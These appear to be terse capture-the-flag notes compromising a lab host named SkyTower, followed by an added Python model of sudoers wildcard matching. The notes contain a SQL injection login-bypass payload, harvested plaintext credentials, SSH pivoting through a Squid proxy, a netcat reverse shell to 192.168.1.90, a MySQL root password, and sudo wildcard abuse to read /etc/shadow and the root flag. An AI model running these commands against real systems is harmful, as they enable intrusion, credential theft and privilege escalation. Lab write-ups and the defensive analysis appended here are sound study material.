192.168.1.100
nmap:
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
nikto:
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
gobuster:
/background (Status: 200)
/index (Status: 200)
debian 7
sql injection:
email a' || 1=1 ;#--
password 123
john@skytech.com
username: john
password: hereisjohn
proxychains:
http 192.168.1.100 3128
ssh:
proxychains ssh john@192.168.1.100 cat /etc/passwd
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
add key:
proxychains ssh-copy-id john@192.168.1.100
reverse shell:
proxychains ssh john@192.168.1.100 "nc 192.168.1.90 443 -e /bin/bash"
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
head /var/www/login.php:
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
mysql -uroot -proot SkyTech -sN -e "select * from login"
1 john@skytech.com hereisjohn
2 sara@skytech.com ihatethisjob
3 william@skytech.com senseable
proxychains ssh-copy-id sara@192.168.1.100
proxychains ssh sara@192.168.1.100 sudo -l
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
proxychains ssh sara@192.168.1.100 "sudo /bin/cat /accounts/* /etc/shadow"
proxychains ssh sara@192.168.1.100 "sudo /bin/cat /accounts/* /root/flag.txt"
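Added example (not part of the original notes): a small Python model of how sudoers compares command arguments, showing why the wildcard rule listed for sara accepts the extra path used above, and how a rule naming one exact file does not. The rule line is copied from the sudo -l output in the notes; /accounts/report.txt is a hypothetical file name used only for the hardened comparison.

```python
import fnmatch
import re

# Constructed input: the rule line printed by `sudo -l` for sara in the notes.
SUDO_L_OUTPUT = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"


def parse_specs(line):
    """Split one `sudo -l` rule line into (runas, command, argument pattern)."""
    specs = []
    for part in line.split(", "):
        m = re.match(r"\((\w+)\)\s+(?:NOPASSWD:\s+)?(\S+)\s*(.*)", part.strip())
        if m:
            specs.append(m.groups())
    return specs


def args_allowed(pattern, argv):
    """Model of sudoers argument matching: the arguments are joined into one
    string and compared with fnmatch-style wildcards, so '*' also matches
    spaces and '/' and can swallow additional arguments."""
    return fnmatch.fnmatchcase(" ".join(argv), pattern)


def audit(line):
    """Return the specs whose argument pattern contains a wildcard."""
    return [s for s in parse_specs(line) if re.search(r"[*?\[]", s[2])]


if __name__ == "__main__":
    for runas, cmd, pattern in audit(SUDO_L_OUTPUT):
        print(f"review: ({runas}) {cmd} {pattern}  <- wildcard in arguments")

    requested = ["/accounts/*", "/etc/shadow"]  # arguments as used in the notes
    # The wildcard rule accepts the second path as part of what '*' matches.
    print("wildcard rule allows it:", args_allowed("/accounts/*", requested))
    # A rule naming one exact file (hypothetical path) rejects the same call.
    print("exact-path rule allows it:",
          args_allowed("/accounts/report.txt", requested))
```

Both rules in the sudo -l output are flagged; replacing the wildcard with explicit file paths in sudoers closes the gap.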